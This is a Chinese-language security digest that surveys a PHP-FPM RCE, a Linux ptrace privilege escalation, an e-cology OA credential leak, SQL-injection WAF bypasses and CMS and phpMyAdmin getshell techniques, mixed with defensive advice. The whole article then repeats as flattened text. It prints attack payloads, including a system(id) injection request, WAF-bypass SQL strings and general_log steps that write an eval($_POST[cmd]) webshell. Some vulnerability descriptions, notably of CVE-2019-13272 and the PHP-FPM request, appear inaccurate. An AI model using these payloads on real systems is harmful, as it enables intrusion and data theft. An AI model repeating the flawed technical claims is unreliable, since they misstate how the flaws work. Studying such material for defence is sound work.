专注Web及移动安全[红日安全103期]
字数 2122 2025-08-18 11:39:08

红日安全103期 - Web及移动安全技术深度解析

一、安全动态与漏洞分析

1.1 中华人民共和国密码法解读

  • 密码法是我国密码领域的第一部法律,规范了密码应用和管理
  • 核心内容包括:密码分类管理、商用密码管理制度、密码安全评估要求
  • 对网络安全从业者的影响:商用密码产品需通过检测认证,密码服务需行政许可

1.2 CVE-2019-11043 PHP-FPM漏洞复现

漏洞背景

  • 影响版本:PHP 7.1.x < 7.1.33, 7.2.x < 7.2.24, 7.3.x < 7.3.11
  • 触发条件:Nginx + PHP-FPM特定配置环境下

漏洞原理

  • 由于Nginx对PATH_INFO处理不当,导致PHP-FPM可以执行任意代码
  • 关键点在于fastcgi_split_path_info正则表达式配置问题

复现步骤

  1. 搭建漏洞环境:Nginx + 受影响PHP版本
  2. 构造恶意请求:
    GET /index.php/PHP_VALUE%0Asystem%28id%29%3B HTTP/1.1
    Host: target
    
  3. 利用工具:使用phuip-fpizdam自动化利用工具

修复方案

  • 升级PHP至安全版本
  • 修改Nginx配置,严格限制PATH_INFO处理

1.3 CVE-2019-13272 Linux本地提权漏洞

漏洞详情

  • 影响内核版本:Linux kernel < 5.1.17
  • 漏洞类型:条件竞争导致的内核内存破坏

利用方法

  1. 通过PTRACE_TRACEME创建竞争条件
  2. 利用错误处理路径获取root权限
  3. 典型利用代码结构:
    if (fork() == 0) {
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        // 竞争操作...
    }
    

缓解措施

  • 升级内核至5.1.17或更高版本
  • 限制普通用户使用ptrace功能

1.4 泛微e-cology OA数据库信息泄露

漏洞特征

  • 影响版本:多个泛微e-cology OA版本
  • 泄露路径:/mobile/DBconfigReader.jsp
  • 泄露内容:数据库连接字符串、用户名密码等敏感信息

检测方法

curl http://target/mobile/DBconfigReader.jsp

修复建议

  1. 删除或限制访问DBconfigReader.jsp
  2. 修改数据库密码
  3. 应用最新补丁

二、Web安全实战技术

2.1 SQL注入绕过WAF技巧

常见绕过方法

  1. 注释混淆:
    SELECT/*xxx*/user/*xxx*/FROM/*xxx*/admin
    
  2. 空白符替换:使用%09,%0a,%0c等替代空格
  3. 大小写混合:SeLeCt替代select
  4. 等价函数替换:mid()替代substring()
  5. 编码混淆:十六进制、URL编码、Unicode编码

实战案例

  • 通过注释和空白符绕过云WAF:
    union%0a/*!12345select*/1,2,3--
    

2.2 WebShell获取与利用

常见获取途径

  1. 文件上传漏洞
  2. 数据库日志文件写入(如phpmyadmin)
  3. 模板注入漏洞
  4. 文件包含漏洞

phpMyAdmin日志Getshell

  1. 开启general_log:
    set global general_log='on';
    set global general_log_file='/var/www/html/shell.php';
    
  2. 写入PHP代码:
    select '<?php eval($_POST[cmd]);?>';
    

防护措施

  • 限制数据库账户权限
  • 关闭不必要的日志功能
  • 设置日志目录不可执行

三、渗透测试技术精要

3.1 弱口令攻击防御

常见弱口令组合

  • 用户名密码相同:admin/admin
  • 简单数字序列:123456, 111111
  • 常见单词:password, qwerty

防御策略

  1. 强制密码复杂度策略
  2. 实施多因素认证
  3. 账户锁定机制
  4. 定期密码更换

3.2 CMS后台Getshell技术

典型漏洞利用链

  1. 通过弱口令或默认凭证进入后台
  2. 利用模板编辑功能写入WebShell
  3. 通过插件/模块上传功能上传恶意文件

某颜色CMS案例

  1. 后台路径:/admin/login.php
  2. Getshell路径:通过模板管理编辑php文件
  3. 持久化方法:写入数据库后门

四、安全工具使用指南

4.1 在线信息收集工具

  1. 子域名查询:

    • 使用DNS记录查询
    • 基于证书透明度日志
    • 常用工具:Sublist3r, Amass
  2. 旁站/C段查询:

    • 基于IP反查域名
    • 使用Bing/Shodan搜索
    • 风险:可能触发IDS/IPS

4.2 LANscan域解析工具

功能特点

  • 多线程设计,扫描速度快
  • 支持顶级域批量解析
  • 结果导出为多种格式

使用场景

  • 内网渗透测试
  • 资产发现与管理
  • 安全审计

五、防御体系建设

5.1 Web应用安全监控

日志监控要点

  1. 异常请求模式检测
  2. SQL注入特征匹配
  3. 文件包含/目录遍历尝试
  4. 敏感文件访问记录

实施方法

  • 使用ELK Stack收集分析日志
  • 部署WAF规则实时防护
  • 定期漏洞扫描

5.2 安全开发实践

  1. 输入验证:白名单优于黑名单
  2. 输出编码:防范XSS
  3. 参数化查询:防止SQL注入
  4. 最小权限原则:限制服务账户权限

六、附录:参考资源

  1. PHP-FPM漏洞官方修复:https://www.php.net/ChangeLog-7.php
  2. Linux内核漏洞公告:https://www.kernel.org/
  3. 密码法全文:http://www.gov.cn/xinwen/2019-10/27/content_5445617.htm
  4. Web安全测试工具集:OWASP ZAP, Burp Suite

本教学文档基于红日安全103期内容整理,涵盖了Web及移动安全领域的核心知识点,包括漏洞分析、渗透技术、防御措施等多个维度。建议读者结合实际环境进行测试验证,并始终遵守法律法规。

红日安全103期 - Web及移动安全技术深度解析 一、安全动态与漏洞分析 1.1 中华人民共和国密码法解读 密码法是我国密码领域的第一部法律,规范了密码应用和管理 核心内容包括:密码分类管理、商用密码管理制度、密码安全评估要求 对网络安全从业者的影响:商用密码产品需通过检测认证,密码服务需行政许可 1.2 CVE-2019-11043 PHP-FPM漏洞复现 漏洞背景 : 影响版本:PHP 7.1.x < 7.1.33, 7.2.x < 7.2.24, 7.3.x < 7.3.11 触发条件:Nginx + PHP-FPM特定配置环境下 漏洞原理 : 由于Nginx对PATH_ INFO处理不当,导致PHP-FPM可以执行任意代码 关键点在于fastcgi_ split_ path_ info正则表达式配置问题 复现步骤 : 搭建漏洞环境:Nginx + 受影响PHP版本 构造恶意请求: 利用工具:使用phuip-fpizdam自动化利用工具 修复方案 : 升级PHP至安全版本 修改Nginx配置,严格限制PATH_ INFO处理 1.3 CVE-2019-13272 Linux本地提权漏洞 漏洞详情 : 影响内核版本:Linux kernel < 5.1.17 漏洞类型:条件竞争导致的内核内存破坏 利用方法 : 通过PTRACE_ TRACEME创建竞争条件 利用错误处理路径获取root权限 典型利用代码结构: 缓解措施 : 升级内核至5.1.17或更高版本 限制普通用户使用ptrace功能 1.4 泛微e-cology OA数据库信息泄露 漏洞特征 : 影响版本:多个泛微e-cology OA版本 泄露路径:/mobile/DBconfigReader.jsp 泄露内容:数据库连接字符串、用户名密码等敏感信息 检测方法 : 修复建议 : 删除或限制访问DBconfigReader.jsp 修改数据库密码 应用最新补丁 二、Web安全实战技术 2.1 SQL注入绕过WAF技巧 常见绕过方法 : 注释混淆: 空白符替换:使用 %09 , %0a , %0c 等替代空格 大小写混合: SeLeCt 替代 select 等价函数替换: mid() 替代 substring() 编码混淆:十六进制、URL编码、Unicode编码 实战案例 : 通过注释和空白符绕过云WAF: 2.2 WebShell获取与利用 常见获取途径 : 文件上传漏洞 数据库日志文件写入(如phpmyadmin) 模板注入漏洞 文件包含漏洞 phpMyAdmin日志Getshell : 开启general_ log: 写入PHP代码: 防护措施 : 限制数据库账户权限 关闭不必要的日志功能 设置日志目录不可执行 三、渗透测试技术精要 3.1 弱口令攻击防御 常见弱口令组合 : 用户名密码相同:admin/admin 简单数字序列:123456, 111111 常见单词:password, qwerty 防御策略 : 强制密码复杂度策略 实施多因素认证 账户锁定机制 定期密码更换 3.2 CMS后台Getshell技术 典型漏洞利用链 : 通过弱口令或默认凭证进入后台 利用模板编辑功能写入WebShell 通过插件/模块上传功能上传恶意文件 某颜色CMS案例 : 后台路径:/admin/login.php Getshell路径:通过模板管理编辑php文件 持久化方法:写入数据库后门 四、安全工具使用指南 4.1 在线信息收集工具 子域名查询: 使用DNS记录查询 基于证书透明度日志 常用工具:Sublist3r, Amass 旁站/C段查询: 基于IP反查域名 使用Bing/Shodan搜索 风险:可能触发IDS/IPS 4.2 LANscan域解析工具 功能特点 : 多线程设计,扫描速度快 支持顶级域批量解析 结果导出为多种格式 使用场景 : 内网渗透测试 资产发现与管理 安全审计 五、防御体系建设 5.1 Web应用安全监控 日志监控要点 : 异常请求模式检测 SQL注入特征匹配 文件包含/目录遍历尝试 敏感文件访问记录 实施方法 : 使用ELK Stack收集分析日志 部署WAF规则实时防护 定期漏洞扫描 5.2 安全开发实践 输入验证:白名单优于黑名单 输出编码:防范XSS 参数化查询:防止SQL注入 最小权限原则:限制服务账户权限 六、附录:参考资源 PHP-FPM漏洞官方修复:https://www.php.net/ChangeLog-7.php Linux内核漏洞公告:https://www.kernel.org/ 密码法全文:http://www.gov.cn/xinwen/2019-10/27/content_ 5445617.htm Web安全测试工具集:OWASP ZAP, Burp Suite 本教学文档基于红日安全103期内容整理,涵盖了Web及移动安全领域的核心知识点,包括漏洞分析、渗透技术、防御措施等多个维度。建议读者结合实际环境进行测试验证,并始终遵守法律法规。